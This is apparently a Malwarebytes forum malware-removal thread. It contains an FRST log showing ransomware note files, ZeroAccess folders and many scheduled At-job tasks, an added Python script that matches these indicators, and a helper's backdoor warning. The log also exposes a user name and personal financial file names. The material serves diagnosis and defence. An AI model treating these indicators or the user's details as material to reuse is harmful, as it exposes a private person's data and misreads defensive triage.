2014-09-07 00:16 - 2014-09-08 21:58 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Vabuoq
2014-09-07 00:16 - 2014-09-08 19:46 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymekwea
2014-09-06 23:10 - 2014-09-06 23:10 - 00008172 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-09-06 23:10 - 2014-09-06 23:10 - 00004130 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-09-06 23:10 - 2014-09-06 23:10 - 00000252 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-09-06 23:06 - 2014-09-08 22:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Oppaekda
2014-09-06 23:05 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EbduHufvu
2014-09-06 22:50 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ugyldoz
2014-09-06 22:47 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\EwrovBofre
2014-09-06 22:21 - 2014-09-11 14:32 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ozowweu
2014-09-06 22:20 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OsesoDnisi
2014-09-06 21:17 - 2014-09-06 21:17 - 00006144 __RSH () C:\Users\smotamedy\AppData\Roaming\{00006DF7-3334-60DC-FBCD-7BF237D757AA}.exe
2014-09-06 18:24 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Nasuqaw
2014-09-06 18:22 - 2014-09-27 14:48 - 00000000 ____D () C:\ProgramData\OlupGawt
2014-09-06 18:17 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ynapocly
2014-09-06 18:14 - 2014-09-06 18:14 - 00000000 ____D () C:\ProgramData\IhegOhrab
2014-09-06 18:00 - 2014-09-27 14:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Hykikeew
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00008172 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00004130 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\administrator\AppData\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-06 17:58 - 2014-09-06 17:58 - 00000252 _____ () C:\Users\admin\AppData\DECRYPT_INSTRUCTION.URL
2014-09-06 17:57 - 2014-09-08 10:23 - 00000000 ___HD () C:\0e31356
2014-09-06 17:57 - 2014-09-06 17:57 - 00000000 ____D () C:\ProgramData\UsmiTfow
2014-09-05 14:33 - 2014-09-05 14:33 - 00145488 _____ () C:\Windows\Minidump\090514-21075-01.dmp
2014-09-04 08:19 - 2014-09-27 17:57 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-04 08:19 - 2014-09-04 08:19 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-04 08:19 - 2014-09-04 08:19 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-27 17:56 - 2014-01-31 12:51 - 01195387 _____ () C:\Windows\WindowsUpdate.log
2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-27 16:57 - 2009-07-13 23:34 - 00016976 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-27 16:50 - 2011-02-01 17:06 - 00000000 ____D () C:\Users\smotamedy\Tracing
2014-09-27 16:49 - 2014-04-09 17:55 - 00004348 _____ () C:\Windows\setupact.log
2014-09-27 16:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-27 15:19 - 2014-01-29 13:07 - 00000000 ____D () C:\ali
2014-09-27 15:00 - 2010-09-03 03:08 - 00000332 _____ () C:\Windows\Tasks\SystemToolsDailyTest.job
2014-09-27 14:49 - 2013-07-23 10:22 - 00000000 ____D () C:\ProgramData\evwqqrk
2014-09-27 14:49 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Speech
2014-09-27 14:48 - 2014-01-30 13:01 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\JAM Software
2014-09-27 14:48 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ezrige
2014-09-27 14:11 - 2009-07-21 00:30 - 00782154 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-24 19:09 - 2010-11-01 09:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Skype
2014-09-17 10:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-14 09:00 - 2010-09-03 03:08 - 00000528 _____ () C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2014-09-09 12:17 - 2009-07-13 23:53 - 00032574 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-09 11:44 - 2010-10-29 15:17 - 00000000 ____D () C:\Users\administrator
2014-09-08 22:36 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Heyqu
2014-09-08 22:30 - 2011-09-06 17:39 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Mozilla
2014-09-08 22:27 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Fioval
2014-09-08 22:12 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Altyc
2014-09-08 22:02 - 2010-12-03 11:16 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\webex
2014-09-08 21:26 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Adobe
2014-09-08 21:05 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\DesktopPwrMgr
2014-09-08 20:57 - 2012-05-07 09:42 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Odpya
2014-09-08 20:47 - 2012-11-14 13:39 - 00000000 ___HD () C:\Users\smotamedy\AppData\Roaming\AC8087BE
2014-09-08 18:52 - 2010-10-29 15:38 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Macromedia
2014-09-08 17:47 - 2012-03-05 14:06 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Aptu
2014-09-07 03:15 - 2010-10-30 15:16 - 00000176 _____ () C:\Windows\system32\config\netlogon.ftl
2014-09-07 01:28 - 2011-09-06 15:06 - 00000536 _____ () C:\Users\smotamedy\UpToDateDesktop_stout.txt
2014-09-07 01:28 - 2010-11-01 09:20 - 00000000 ____D () C:\Users\smotamedy\UpToDate
2014-09-07 01:28 - 2010-10-29 15:29 - 00000000 ____D () C:\Users\smotamedy
2014-09-07 01:27 - 2012-03-03 11:31 - 00032280 ____N () C:\Users\smotamedy\Documents\Jan expenses 2012.xls
2014-09-07 01:27 - 2011-12-02 13:10 - 00012312 ____N () C:\Users\smotamedy\Documents\October_2011.xlsx
2014-09-07 01:27 - 2011-07-18 14:50 - 00033816 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 11 11 thru 07 15 11.xls
2014-09-07 01:27 - 2011-07-18 14:50 - 00016664 ____N () C:\Users\smotamedy\Documents\Riveroaks OTC 07 04 11 thru 07 08 11.xls
2014-09-07 01:27 - 2011-05-23 12:24 - 00512024 ____N () C:\Users\smotamedy\Documents\MD stats 2010 (9).xls
2014-09-07 01:26 - 2013-07-15 12:31 - 08812568 _____ () C:\Users\smotamedy\Desktop\River Oaks Beauty and Wellness Group (Backup Jul 15,2013  12 30 PM).QBB
2014-09-07 01:26 - 2012-01-05 18:53 - 00030744 ____N () C:\Users\smotamedy\Documents\dec 2011 colection expenses.xls
2014-09-07 01:26 - 2011-12-20 18:38 - 00022552 _____ () C:\Users\smotamedy\Documents\expenses for 2011-2012.xls
2014-09-07 01:26 - 2011-12-02 13:19 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000024.xls
2014-09-07 01:26 - 2011-12-02 13:13 - 00012312 ____N () C:\Users\smotamedy\Documents\collection,expenses Oct 2011.xlsx
2014-09-07 01:26 - 2011-12-02 12:41 - 00030744 ____N () C:\Users\smotamedy\Documents\Copy of Xl0000021.xls
2014-09-07 01:26 - 2011-12-02 11:48 - 00031256 ____N () C:\Users\smotamedy\Documents\Collection,expenses Nov 2011.xls
2014-09-07 01:26 - 2011-07-07 11:41 - 00014616 ____N () C:\Users\smotamedy\Documents\cleaning duties.xls
2014-09-07 01:21 - 2013-07-10 11:58 - 00000000 ____D () C:\Users\Public\Documents\Intuit
2014-09-07 01:21 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-06 23:10 - 2013-07-10 11:58 - 00000000 ____D () C:\ProgramData\Intuit
2014-09-06 23:10 - 2010-09-03 03:39 - 00000000 ____D () C:\ProgramData\Lenovo
2014-09-06 23:10 - 2010-09-03 03:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-06 23:06 - 2009-07-21 01:20 - 00000000 ____D () C:\SWTOOLS
2014-09-06 23:05 - 2010-09-03 03:09 - 00000000 ___HD () C:\ProgramData\DDNI
2014-09-06 17:58 - 2010-10-30 11:03 - 00000000 ____D () C:\Users\admin
2014-09-06 17:57 - 2009-07-21 01:20 - 00008728 __RSH () C:\BOOTSECT.BAK
2014-09-05 14:33 - 2011-10-31 10:33 - 1273454962 _____ () C:\Windows\MEMORY.DMP
2014-09-05 14:33 - 2011-10-31 10:33 - 00000000 ____D () C:\Windows\Minidump
 
ZeroAccess:
C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51
 
ZeroAccess:
C:\$Recycle.Bin\S-1-5-18\$0a1e85f3e1cd51d1261ae5ea5aa3df51
 
Files to move or delete:
====================
C:\ProgramData\bw5EWA37M.dat
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At11.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At15.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At17.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At19.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At21.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At23.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At25.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At27.job
C:\Windows\Tasks\At28.job
C:\Windows\Tasks\At29.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\At30.job
C:\Windows\Tasks\At31.job
C:\Windows\Tasks\At32.job
C:\Windows\Tasks\At33.job
C:\Windows\Tasks\At34.job
C:\Windows\Tasks\At35.job
C:\Windows\Tasks\At36.job
C:\Windows\Tasks\At37.job
C:\Windows\Tasks\At38.job
C:\Windows\Tasks\At39.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At40.job
C:\Windows\Tasks\At41.job
C:\Windows\Tasks\At42.job
C:\Windows\Tasks\At43.job
C:\Windows\Tasks\At44.job
C:\Windows\Tasks\At45.job
C:\Windows\Tasks\At46.job
C:\Windows\Tasks\At47.job
C:\Windows\Tasks\At48.job
C:\Windows\Tasks\At49.job
C:\Windows\Tasks\At5.job
C:\Windows\Tasks\At50.job
C:\Windows\Tasks\At51.job
C:\Windows\Tasks\At52.job
C:\Windows\Tasks\At53.job
C:\Windows\Tasks\At54.job
C:\Windows\Tasks\At55.job
C:\Windows\Tasks\At56.job
C:\Windows\Tasks\At57.job
C:\Windows\Tasks\At58.job
C:\Windows\Tasks\At59.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At60.job
C:\Windows\Tasks\At61.job
C:\Windows\Tasks\At62.job
C:\Windows\Tasks\At63.job
C:\Windows\Tasks\At64.job
C:\Windows\Tasks\At65.job
C:\Windows\Tasks\At66.job
C:\Windows\Tasks\At67.job
C:\Windows\Tasks\At68.job
C:\Windows\Tasks\At69.job
C:\Windows\Tasks\At7.job
C:\Windows\Tasks\At70.job
C:\Windows\Tasks\At71.job
C:\Windows\Tasks\At72.job
C:\Windows\Tasks\At73.job
C:\Windows\Tasks\At74.job
C:\Windows\Tasks\At75.job
C:\Windows\Tasks\At76.job
C:\Windows\Tasks\At77.job
C:\Windows\Tasks\At78.job
C:\Windows\Tasks\At79.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At80.job
C:\Windows\Tasks\At81.job
C:\Windows\Tasks\At82.job
C:\Windows\Tasks\At83.job
C:\Windows\Tasks\At84.job
C:\Windows\Tasks\At85.job
C:\Windows\Tasks\At86.job
C:\Windows\Tasks\At87.job
C:\Windows\Tasks\At88.job
C:\Windows\Tasks\At89.job
C:\Windows\Tasks\At9.job
C:\Windows\Tasks\At90.job
C:\Windows\Tasks\At91.job
C:\Windows\Tasks\At92.job
C:\Windows\Tasks\At93.job
C:\Windows\Tasks\At94.job
C:\Windows\Tasks\At95.job
C:\Windows\Tasks\At96.job
 
 
Some content of TEMP:
====================
C:\Users\smotamedy\AppData\Local\Temp\SHSetup.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-26 00:05
 
==================== End Of Log ============================

 

Addition.txt

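A small triage script over the log excerpt above, added here as an example (it is not part of the original post and not FRST's own code). It pulls the file paths out of FRST-style lines and flags the two indicators FRST reported in this log: the 32-hex-character "$..." folder under C:\$Recycle.Bin\<SID>, which FRST labels ZeroAccess and which appears here under both the user's SID and S-1-5-18 (SYSTEM), and the run of At<N>.job files in C:\Windows\Tasks, the naming pattern the legacy at.exe scheduler produces, which FRST lists under "Files to move or delete". The sample log is a hand-picked excerpt; the regexes, function names and the threshold of three tasks are my own choices, not anything FRST documents.

```python
"""Triage helper for FRST-style log excerpts (added example, not FRST's own code).

Indicators checked, both taken from the log posted above:
  1. A folder named '$' plus 32 hex characters directly under
     C:\\$Recycle.Bin\\<SID>\\ (the layout FRST flags as ZeroAccess).
  2. A burst of At<N>.job files in C:\\Windows\\Tasks, the file names the
     legacy at.exe scheduler creates for its jobs.
"""
import re

# Constructed excerpt modelled on the posted log; a few lines only.
SAMPLE_LOG = r"""
2014-09-27 16:49 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
ZeroAccess:
C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51
C:\$Recycle.Bin\S-1-5-18\$0a1e85f3e1cd51d1261ae5ea5aa3df51
Files to move or delete:
====================
C:\ProgramData\bw5EWA37M.dat
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
"""

# C:\$Recycle.Bin\<SID>\$<32 hex>   (SID may be S-1-5-18 or a domain/local S-1-5-21-... SID)
ZA_RECYCLE_RE = re.compile(r"^C:\\\$Recycle\.Bin\\(S-1-5-[\d-]+)\\\$([0-9a-f]{32})$", re.IGNORECASE)
# C:\Windows\Tasks\At<N>.job
AT_JOB_RE = re.compile(r"^C:\\Windows\\Tasks\\At(\d+)\.job$", re.IGNORECASE)
# First drive-letter path on a line; FRST puts the path last on each entry.
PATH_RE = re.compile(r"([A-Z]:\\.*)")


def extract_paths(text):
    r"""Return every Windows path found in the log text, one per line."""
    paths = []
    for line in text.splitlines():
        m = PATH_RE.search(line)
        if m:
            paths.append(m.group(1).rstrip())
    return paths


def find_zeroaccess(paths):
    r"""Map each 32-hex recycle-bin folder name to the SIDs it appears under."""
    hits = {}
    for p in paths:
        m = ZA_RECYCLE_RE.match(p)
        if m:
            sid, name = m.group(1), m.group(2).lower()
            hits.setdefault(name, []).append(sid)
    return hits


def find_at_jobs(paths):
    r"""Return the sorted numeric suffixes of At<N>.job files in C:\Windows\Tasks."""
    nums = []
    for p in paths:
        m = AT_JOB_RE.match(p)
        if m:
            nums.append(int(m.group(1)))
    return sorted(nums)


def triage(text, at_job_threshold=3):
    """Run both checks and return the raw matches plus human-readable findings."""
    paths = extract_paths(text)
    za = find_zeroaccess(paths)
    at_jobs = find_at_jobs(paths)
    findings = []
    for name, sids in za.items():
        # The same folder name under more than one SID (here the user and SYSTEM)
        # is the strongest form of this indicator.
        findings.append("ZeroAccess-style folder $%s under %d SID(s): %s"
                        % (name, len(sids), ", ".join(sids)))
    if len(at_jobs) >= at_job_threshold:
        findings.append("%d At<N>.job tasks (At%d..At%d): list them with "
                        "'schtasks /query /v' and read the .job targets before deleting"
                        % (len(at_jobs), at_jobs[0], at_jobs[-1]))
    return {"zeroaccess": za, "at_jobs": at_jobs, "findings": findings}


if __name__ == "__main__":
    for line in triage(SAMPLE_LOG)["findings"]:
        print(line)
```

Two caveats when running this over a full FRST log: the hidden 7B296FB0-...-5P-0/-5P-1 files at the top of the listing are normal Windows 7 activation data and are deliberately not matched, and a single At<N>.job is not suspicious on its own (an administrator can create one with at.exe), which is why the script only reports a run of them.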

Hello aagah, welcome to Malwarebytes' Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that.    :)
 
General P2P/Piracy Notice: 
 

If you are using Peer to Peer (P2P) filesharing software such as uTorrent, BitTorrent or similar you must either fully uninstall or completely disable the programme(s) from running whilst receiving assistance at this forum. 
Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.
If you have illegal/cracked/keygen or similar software on the computer, please remove/uninstall the software now and read the policy on Piracy. Failure to do so will also result in your topic being closed.

 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Please read through my instructions thoroughly, and ensure you carry out each step in the order specified.
  • Please do not post logs using the CODE, QUOTE or ATTACHMENT format. Logs should be posted directly in plain text. If you receive an error whilst posting, please break the log in half and use multiple posts.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in ascertaining the current situation & providing the best set of instructions for you.
  • Please backup important documents before proceeding with my instructions.
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before you run anything.
  • Topics are locked if no response is made after 4 days. Please inform me if you will require additional time to complete my instructions.
     

======================================================
 
Your machine is heavily infected. As such, I must unfortunately issue you the following warning. Please let me know how you wish to proceed. 
 

BACKDOOR WARNING
 
------------------------------
 
One or more of the identified infections is known to use a backdoor, that allows attackers to remotely control your computer, download/execute files and steal critical system, financial and personal information.
 
Please disconnect your computer from the internet immediately. If your computer was used for online banking, has credit card information or other sensitive data, using a non-infected computer/device you should immediately change all account information (including those used for banking, email, eBay, PayPal, online forums, etc.). Consider these accounts already compromised.
 
If you have used a router, you will need to reset it with a strong logon/password to ensure the malware cannot gain control before connecting again. Banking and credit card institutions should be notified of the possible security breach immediately. Please read the following for more information: How Do I Handle Possible Identity Theft, Internet Fraud and CC Fraud?
 
Whilst the identified infection(s) can be removed, there is no way to guarantee that your computer will be trustworthy again. This is due to the nature of the infection, which allows the attacker complete control over the computer. Many experts in the security community believe that once infected with this type of malware, the best course of action is to reformat the hard drive and reinstall the Operating System. Please read the following articles for more information.

Please let me know how you wish to proceed, and if you have any questions.

  • Root Admin

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!
